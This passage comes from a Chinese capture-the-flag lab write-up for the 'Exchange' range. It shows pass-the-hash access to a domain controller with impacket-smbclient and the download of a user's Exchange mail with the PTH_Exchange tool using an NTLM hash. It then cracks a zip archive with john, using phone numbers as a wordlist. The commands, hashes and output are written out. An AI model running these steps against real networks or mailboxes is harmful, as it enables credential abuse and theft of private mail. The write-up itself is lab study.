2022/10/23  14:34    <DIR>          Downloads
2022/10/23  14:34    <DIR>          Favorites
2022/10/23  21:34    <DIR>          flag
2022/10/23  14:34    <DIR>          Links
2022/10/23  14:34    <DIR>          Music
2022/10/23  14:34    <DIR>          Pictures
2022/10/23  14:34    <DIR>          Saved Games
2022/10/23  14:34    <DIR>          Searches
2022/10/23  14:34    <DIR>          Videos
               0 个文件              0 字节
              14 个目录 28,635,594,752 可用字节

C:\Users\Administrator> type flag\f*

flag\flag.txt


____  ___.___   _____   ________ __________    _____    _______    ________
\   \/  /|   | /  _  \  \_____  \\______   \  /  _  \   \      \  /  _____/
 \     / |   |/  /_\  \  /   |   \|       _/ /  /_\  \  /   |   \/   \  ___
 /     \ |   /    |    \/    |    \    |   \/    |    \/    |    \    \_\  \
/___/\  \|___\____|__  /\_______  /____|_  /\____|__  /\____|__  /\______  /
      \_/            \/         \/       \/         \/         \/        \/



flag04: flag{411ce50b-da03-44e8-95a3-7058a3c711ca}

PTH Exchange

最后来看 DC 机器

1
2
3
4
5
6
7
8
9
10
11
12
└─# proxychains -q impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -dc-ip 172.22.3.2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use C$
# cd /Users/Lumia/Desktop
# ls
drw-rw-rw-          0  Sun Oct 23 21:40:24 2022 .
drw-rw-rw-          0  Sun Oct 23 20:22:44 2022 ..
-rw-rw-rw-        282  Sun Oct 23 20:22:55 2022 desktop.ini
-rw-rw-rw-     668436  Sun Oct 23 21:40:16 2022 secret.zip
# get secret.zip

flag 就在压缩包中,但需要密码

之前是拿到了 Lumia 的 hash

1
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::

Jumbo-WJB/PTH_Exchange: If you only have hash, you can still operate exchange 获取邮件

1
python pthexchange.py  --target https://mail.exchange.com --username "yourusername" --password "yourpassword" --action Download

然后下载邮件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─# proxychains -q python pthexchange.py  --target https://172.22.3.9/ --username "Lumia" --password "862976f8b23c13529c2fb1428e710296:862976f8b23c13529c2fb1428e710296" --action Download
2025-09-07 17:38:13,461 - DEBUG - [Stage 777] Get Mails Stage 1 Finditem ing...
/usr/lib/python3/dist-packages/ntlm_auth/rc4.py:18: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  algo = algorithms.ARC4(key)
2025-09-07 17:38:14,936 - DEBUG - [Stage 777] Get Mails Stage 2 GetItem ing...
2025-09-07 17:38:18,530 - DEBUG - [Stage 777] Get Mails Stage 3 Downloaditem ing...
[+] Item [output/item-0.eml] saved successfully
2025-09-07 17:38:18,539 - DEBUG - [Stage 555] Ready Download Attachmenting...
2025-09-07 17:38:18,794 - DEBUG - [Stage 555] Determine if there are attachments in the email...
2025-09-07 17:38:18,794 - DEBUG - [Stage 555] This Mail Has Attachment...
2025-09-07 17:38:18,794 - DEBUG - [Stage 555] Start Get Attachment Content...
2025-09-07 17:38:21,245 - DEBUG - [Stage 555] Start Download Attachment...
[+] Item [output/item-0-secret.zip] saved successfully
2025-09-07 17:38:21,249 - DEBUG - [Stage 777] Get Mails Stage 2 GetItem ing...
2025-09-07 17:38:21,448 - DEBUG - [Stage 777] Get Mails Stage 3 Downloaditem ing...
[+] Item [output/item-1.eml] saved successfully
2025-09-07 17:38:21,449 - DEBUG - [Stage 555] Ready Download Attachmenting...
2025-09-07 17:38:21,635 - DEBUG - [Stage 555] Determine if there are attachments in the email...
2025-09-07 17:38:21,635 - DEBUG - [Stage 555] This Mail Has Attachment...
2025-09-07 17:38:21,635 - DEBUG - [Stage 555] Start Get Attachment Content...
2025-09-07 17:38:21,847 - DEBUG - [Stage 555] Start Download Attachment...
[+] Item [output/item-1-phone lists.csv] saved successfully

拿到一些文件,其中有一封邮件

“Encrypt with your phone number.”,提示手机号解密,提取手机号对 zip 爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─# cut -d ',' -f3 item-1-phone\ lists.csv > phone.txt

┌──(root㉿butt3rf1y)-[/home/butt3rf1y/PTH_Exchange-main/output]
└─# zip2john item-0-secret.zip >hash
ver 2.0 item-0-secret.zip/flag.docx PKZIP Encr: cmplen=668284, decmplen=671056, crc=AFEF0968 ts=AB91 cs=afef type=8

┌──(root㉿butt3rf1y)-[/home/butt3rf1y/PTH_Exchange-main/output]
└─# john --wordlist=phone.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
18763918468      (item-0-secret.zip/flag.docx)
1g 0:00:00:00 DONE (2025-09-07 17:45) 16.66g/s 8350p/s 8350c/s 8350C/s phone..15989600577
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

密码 18763918468

1
flag03: flag{cf0c753c-233f-4729-8984-0746ea5878b7}
渗透 > 靶机 > 春秋云镜
#Fastjson Exchange WirteDacl PTH
春秋云镜-Exchange
http://example.com/2025/09/14/春秋云镜-Exchange/
作者
butt3rf1y
发布于
2025年9月14日
许可协议